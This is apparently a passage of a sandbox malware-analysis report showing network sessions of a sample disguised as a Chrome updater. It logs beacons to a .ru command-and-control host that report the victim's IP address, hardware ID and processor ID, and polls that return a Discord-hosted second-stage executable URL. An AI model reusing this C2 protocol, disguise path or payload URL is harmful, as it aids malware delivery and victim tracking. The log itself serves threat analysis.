                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=8JflR9rZTTmcyP1ShZvMdZQbdVpOGGxNJu2bUVUxCdFsH7pEsO3aoNRqMAzeXB36h6JQnJ%2BE%2FdyPYkakhxbzzWrA2AXYVmWuLj3kDCwVyxp%2BKxC1RwBEUbD5ZAJ5TPxkU9RLcqaW"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6cebf008f22-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:31 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    46192.168.2.649767104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:31 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:31 UTC599INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:31 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=OwJJraihIjDZhWECzIiIw1HZrmO9n62ndlBco9LJrxJizDoKzwPcvJl2UhZLW8QJjT9Oa%2B2w5tAstYxrn9%2BsyeDq7Se8oTK7pjgdQeLyMBuM5yepFa79ZX9uR%2FfX1tBP7ALgcOfq"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6d24fd807ef-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:31 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:31 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    47192.168.2.649768104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:31 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:32 UTC603INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:32 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uI7kxh3AAwZo4FnEoYapOWGlBtO935AFNIQ2M2B3%2BCRUces1AJK%2BdK2F%2BotTBwTne%2F8RgPZbfUqThvbmCbX4imay8K5zUaeQVOFRFaWtTr04v4irHUM6emFrlWUZjolte7ucP%2BsF"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6d348523926-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:32 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    48192.168.2.649769162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:31 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:32 UTC1346INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:32 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c6d688022418-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 14
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:32 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPpAlGdKaN1uiBpjD2ZqIMs0BtE911xE7HCoSFLPLd1NPY-8PyHba9dJDWmELy731FdKcKTHaHKjWQ
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=Mw0Va0sWMTSZVzWG0TWrVGgnhwsT0MlJ5zUuwMnwe34-1704353432-1-Ae9nuGXdlHeGyLMt63Is+MCFrLTVHFhQChGONEWimamaddvSdnQKqCsO1TD5+m7WafmcGQMw+DRvqAk5/f8+14Y=; path=/; expires=Thu, 04-Jan-24 08:00:32 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ge8DGB69T6ug5dOkKI6MATkF%2BTfvdsBEJbmfHa67%2FkMt9USI44Un%2FCEUZqDKeLjAC3%2Bt%2BasDjSZY3Uk09z51YAxDWW4DJbtI8Aq3azArvmX2I3%2FYmOZUhlehQivIf4lCaAqqtg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=6yIyJ7EU01yTjJGFvTyu._U4HaaYJl0IClKSJAU9sBg-1704353432108-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:32 UTC23INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63
                                                                                    Data Ascii: <?xml version='1.0' enc
                                                                                    2024-01-04 07:30:32 UTC213INData Raw: 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: oding='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    49192.168.2.649770162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:32 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:32 UTC1344INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:32 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c6d8cc601729-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 2
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:32 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqhTB1LXLSJArSkskn7kB2Cz2FEf8U7kttMHLDyayzx2-v-tISfzRDpzXreML572QUvUSs
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=S7OcHqbdmlnbfBGwzWY7_p3wKplm05dMNSOFfTpQTJs-1704353432-1-Ad6gPCq/PxSBEJiFB1AfVcFj/QIaUekoulAWHqaZppl7GHmPm9q/XjSnofDXRiQXgrtdV7U4H18uTIl6/RXgcw0=; path=/; expires=Thu, 04-Jan-24 08:00:32 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=I5CQIlx4pexWVZmuF3rrBx9H%2B%2F4SqCtqGq%2FWbmOIqYxThagXAOJ88IIzEt9tBaIlgMAE3CYUHHC%2BE1NYVDF%2BlXUnW4m2h%2BRqhzSmexk1Yl%2F%2FTzwbmV5S1vyOt%2BqMZQnhIcdsOA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=Fct10JAeij8IrmNjv8Ea5mSiesOZiuPzMT_OApjyzgk-1704353432465-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:32 UTC25INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64
                                                                                    Data Ascii: <?xml version='1.0' encod
                                                                                    2024-01-04 07:30:32 UTC211INData Raw: 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ing='UTF-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    50192.168.2.649771104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:32 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:32 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:32 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9GmOrxEz5FgFLMXDy8rGa5I2sH8ZxXrvI16ddJBR2UE9jhLnZOH63vZ%2BR1C9kfzCxVAV3MWDIeSlyFYi%2FV2y2vcmPE5W7UrM2EdYwSYtYKJnzd3HyVLGDZvYQrjHMicK1XqkpKU%2B"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6da285f57fa-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:32 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    51192.168.2.649772104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:32 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:33 UTC578INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:33 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=97UtMZvQz%2B4LGDTzL7l%2F7%2F80IwVbXqqEfrOVbXYkGlInA2WY2xQKqrqXqXuUFrufWidNAAl1vNH7PhvhDrdvxtzGuWdVRTaJZxMiZh%2BQjFAsvY5L5bjY4rtz69R7v3qn1rPTE4jM"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6dc4c8d07a0-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:33 UTC12INData Raw: 37 0d 0a 55 50 44 41 54 45 44 0d 0a
                                                                                    Data Ascii: 7UPDATED
                                                                                    2024-01-04 07:30:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    52192.168.2.649773104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:33 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:33 UTC601INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:33 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kWYrzF7jqwlLUnpdT%2BFPZHrPBzkZ0DrUXOvN%2FZbEkPjUNW5jw2iKFPjsgpqI6scncOMnpZVw83p%2BzJqRfPvizyD2HPqsuWXaSJH0IL0St8KXsSzHyLpC8QQRg%2BBfLWWIhHOmyUED"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6dead6c20d2-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:33 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:33 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    53192.168.2.649774104.21.89.1934433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:33 UTC62OUTGET //list.php?id=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    2024-01-04 07:30:34 UTC597INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:34 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Vary: Accept-Encoding
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=q%2B%2BCpRmtvR2wKGH96dUBhxLkG7WFXSfzTFpSVoQtY7A3XmSMrM8tbVuD3TdmNdiIRSgIYSn8XG5oUSVBh8SO8h7HsIq5urtHYUueFR30DQw2rNByawRMOdJwVaVWX5gbEDIzDi4T"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8401c6e0ac215b2f-IAD
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-01-04 07:30:34 UTC115INData Raw: 36 64 0d 0a 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 7c 34 36 32 37 38 38 33 0a 4e 4f 54 41 53 4b 53 0d 0a
                                                                                    Data Ascii: 6dhttps://cdn.discordapp.com/attachments/1165051639040843819/1166800645383270420/peresozdar.exe|4627883NOTASKS
                                                                                    2024-01-04 07:30:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    54192.168.2.649775162.159.129.23344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:34 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:34 UTC1337INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:34 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c6e408d96fec-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 7
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:34 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPrdbD-6M3VDJwvuVaWMyZIoddmT0kGavFqyZCCeFS3yMb7y1eiW98YXjVseKzj56TszK3GrlYCQLw
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=_yJ9gnkBc8JQeX1tPVHtd0iStQJJu4hz5A.zyzoCl3c-1704353434-1-ASa0N9qlaAiaJwkzFnDlGbEyeam8j5eNZvgRGR0M3L4ks8DI33LJJmRMTF0lEiFmckTw5YIFQDIAmMpHHXVG3aU=; path=/; expires=Thu, 04-Jan-24 08:00:34 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ipd0USj6LKMUR5xlDdNLVIGIfzz2DToPfUxXkUgAUcNQ15F%2FfGgT6RHrEBv1tJmNWuDItGJuTd2EWek8fdez1DUaQbDNdGSwFl%2B5jDb5y76ccvmUN6XDwg073Ie1Gm618cbOkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=crlilWgAl4EdQhbPntq2nn11x30KqXCR59b3FrOB7gk-1704353434272-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:34 UTC32INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54
                                                                                    Data Ascii: <?xml version='1.0' encoding='UT
                                                                                    2024-01-04 07:30:34 UTC204INData Raw: 46 2d 38 27 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: F-8'?><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    55192.168.2.649776162.159.129.2334433172C:\Users\user\Desktop\LnSNtO8JIa.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:34 UTC134OUTGET /attachments/1165051639040843819/1166800645383270420/peresozdar.exe HTTP/1.1
                                                                                    Host: cdn.discordapp.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:34 UTC1332INHTTP/1.1 404 Not Found
                                                                                    Date: Thu, 04 Jan 2024 07:30:34 GMT
                                                                                    Content-Type: application/xml; charset=UTF-8
                                                                                    Content-Length: 236
                                                                                    Connection: close
                                                                                    CF-Ray: 8401c6e62a49081c-IAD
                                                                                    CF-Cache-Status: HIT
                                                                                    Accept-Ranges: bytes
                                                                                    Age: 9
                                                                                    Cache-Control: public, max-age=31536000
                                                                                    Content-Disposition: attachment
                                                                                    Expires: Fri, 03 Jan 2025 07:30:34 GMT
                                                                                    Vary: Accept-Encoding
                                                                                    Alt-Svc: h3=":443"; ma=86400
                                                                                    X-GUploader-UploadID: ABPtcPqOIGAzj-dl_AWpE-LsBDYDlVOVkAcgC9G1wrcrN3p-tot3JhzRYuEor72QuuG9QSCFt8s
                                                                                    X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                    Set-Cookie: __cf_bm=yBUSdLotahDgKoDu1U.Nizpa9RQpzpUlo4hcSfQE8Do-1704353434-1-AWbEEuh3f6IXG3taBbjvjIf55ySbeVpaolfk02EcjjWJ6oUabJzCSBQvySiodagTuicqrcfdxcPcu0/OPqjMOO8=; path=/; expires=Thu, 04-Jan-24 08:00:34 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=2sdzyUwpouzVqGel5CSVgwfhg5cVzukIoMxR4cSGWPweg0qIsKcyjAnqNwJyO0gPdAWi%2BPyS3DGlueXO2%2BLY5CJyFr%2Bba9UfP0iQQNz0soV0j4hFQ2i3JNVpc0lo2GazFc2XEA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Set-Cookie: _cfuvid=t79nAbKNgMwECRF0fLFn56hBi4uVNduKZhus6FodrAw-1704353434603-0-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    2024-01-04 07:30:34 UTC37INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f
                                                                                    Data Ascii: <?xml version='1.0' encoding='UTF-8'?
                                                                                    2024-01-04 07:30:34 UTC199INData Raw: 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 4e 6f 53 75 63 68 4b 65 79 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 54 68 65 20 73 70 65 63 69 66 69 65 64 20 6b 65 79 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 2e 3c 2f 4d 65 73 73 61 67 65 3e 3c 44 65 74 61 69 6c 73 3e 4e 6f 20 73 75 63 68 20 6f 62 6a 65 63 74 3a 20 64 69 73 63 6f 72 64 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 31 36 35 30 35 31 36 33 39 30 34 30 38 34 33 38 31 39 2f 31 31 36 36 38 30 30 36 34 35 33 38 33 32 37 30 34 32 30 2f 70 65 72 65 73 6f 7a 64 61 72 2e 65 78 65 3c 2f 44 65 74 61 69 6c 73 3e 3c 2f 45 72 72 6f 72 3e
                                                                                    Data Ascii: ><Error><Code>NoSuchKey</Code><Message>The specified key does not exist.</Message><Details>No such object: discord/attachments/1165051639040843819/1166800645383270420/peresozdar.exe</Details></Error>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    56192.168.2.649777104.21.89.19344327288C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-01-04 07:30:34 UTC189OUTGET /online.php?country=US&ipaddr=102.165.48.52&HWID=9e146be9-c76a-4720-bcdb-53011b87bd06&processorid=6F39597F7B&ownerid=1081 HTTP/1.1
                                                                                    Host: central-cee-doja.ru
                                                                                    Connection: Keep-Alive
                                                                                    2024-01-04 07:30:35 UTC576INHTTP/1.1 200 OK
                                                                                    Date: Thu, 04 Jan 2024 07:30:35 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    CF-Cache-Status: DYNAMIC
